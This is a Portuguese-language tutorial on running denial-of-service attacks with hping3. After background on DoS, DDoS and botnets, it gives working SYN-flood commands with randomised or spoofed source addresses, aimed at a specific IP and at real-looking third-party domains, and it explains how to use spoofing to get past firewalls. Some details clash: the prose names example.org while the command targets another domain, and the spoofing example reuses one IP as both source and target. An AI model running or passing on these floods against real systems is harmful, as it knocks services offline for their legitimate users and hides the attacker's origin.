Este tutorial concentra-se em ataques DDOS (negação de serviço distribuída) usando a ferramenta hping3. Se já está familiarizado com os ataques DOS (Denial of Service) e DDOS, pode continuar a ler as instruções práticas do hping3, caso contrário, é recomendável aprender como esses ataques funcionam.
Ataques DOS
Um ataque de negação de serviço (DOS) é uma técnica muito simples para negar acessibilidade a serviços (por isso é chamado de ataque de “negação de serviço”). Este ataque consiste em sobrecarregar o alvo com pacotes superdimensionados ou em grande quantidade.
Embora seja muito fácil de executar, esse ataque não compromete as informações ou a privacidade do alvo, não é um ataque de penetração e visa apenas impedir o acesso ao alvo.
Ao enviar uma quantidade de pacotes, o alvo não consegue lidar com os invasores, impedindo que o servidor atenda a usuários legítimos.
Os ataques DOS são executados a partir de um único dispositivo, portanto, é fácil interrompê-los bloqueando o IP do invasor, mas o invasor pode alterar e até mesmo falsificar (clonar) o endereço IP de destino, mas não é difícil para os firewalls lidar com esses ataques , ao contrário do que acontece com os ataques DDOS.
Ataques DDOS
Um ataque de negação de serviço distribuído (DDOS) é semelhante a um ataque DOS, mas executado a partir de nós diferentes (ou atacantes diferentes) simultaneamente. Normalmente, os ataques DDOS são executados por botnets. Botnets são scripts ou programas automatizados que infectam computadores para realizar uma tarefa automatizada (neste caso, um ataque DDOS). Um hacker pode criar um botnet e infectar muitos computadores a partir dos quais botnets lançarão ataques DOS, o fato de muitos botnets dispararem simultaneamente transforma o ataque DOS em um ataque DDOS (é por isso que é chamado de “distribuído”).
Claro, existem exceções em que os ataques DDOS foram realizados por atacantes humanos reais, por exemplo, o grupo de hackers Anonymous integrado por milhares de pessoas em todo o mundo usou essa técnica com muita frequência devido à sua fácil implementação (exigia apenas voluntários que compartilhassem sua causa), foi assim que o Anonymous deixou o governo líbio de Gaddafi completamente desconectado durante a invasão, o estado líbio ficou indefeso diante de milhares de atacantes de todo o mundo.
Este tipo de ataque, quando realizado a partir de vários nós diferentes, é extremamente difícil de prevenir e interromper e normalmente requer hardware especial para lidar, pois firewalls e aplicativos defensivos não estão preparados para lidar com milhares de atacantes simultaneamente. Este não é o caso do hping3, a maioria dos ataques realizados por meio desta ferramenta serão bloqueados por dispositivos defensivos ou software, embora seja útil em redes locais ou contra alvos mal protegidos.
Sobre hping3
A ferramenta hping3 permite enviar pacotes manipulados. Esta ferramenta permite controlar o tamanho, a quantidade e a fragmentação dos pacotes para sobrecarregar o alvo e contornar ou atacar os firewalls. O Hping3 pode ser útil para fins de teste de segurança ou capacidade, usando-o pode testar a eficácia do firewall e se um servidor pode lidar com uma grande quantidade de pacotes. Abaixo, encontrará instruções sobre como usar o hping3 para fins de teste de segurança.
Primeiros passos com ataques DDOS usando hping3:
Em distribuições baseadas em Debian e Linux, pode instalar hping3 executando: # apt install hping3 -y
Um simples ataque DOS (não DDOS) seria: # sudo hping3 -S –flood -V -p 80 170.155.9.185
Onde:
sudo: fornece os privilégios necessários para executar o hping3.
hping3: chama o programa hping3.
-S: especifica pacotes SYN.
–Flood: atire com discrição, as respostas serão ignoradas (é por isso que as respostas não serão mostradas) e os pacotes serão enviados o mais rápido possível.
-V: Verbosidade.
-p 80: porta 80, pode substituir este número pelo serviço que deseja atacar.
170.155.9.185: IP de destino.
Inundar usando pacotes SYN contra a porta 80:
O exemplo a seguir retrata um ataque SYN contra example.org:
# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source
Onde:
Example.org: é o destino
-q: breve saída
-n: mostra o IP de destino em vez do host.
-d 120: define o tamanho do pacote de dados
–rand-source: oculta o endereço IP.
O exemplo a seguir mostra outro exemplo possível de inundação:
Inundação de SYN contra a porta 80:
# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood
Com o hping3 também pode atacar seus alvos com um IP falso, a fim de contornar um firewall, pode até clonar o seu próprio IP de destino, ou qualquer endereço permitido que conheça (pode consegui-lo por exemplo com Nmap ou um sniffer para ouvir estabelecido conexões).
A sintaxe seria:
# sudo hping3 -a < FAKE IP > < target > -S -q -p 80 --faster --c 200000
Neste exemplo prático, o ataque pareceria:
# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --faster --c 200000
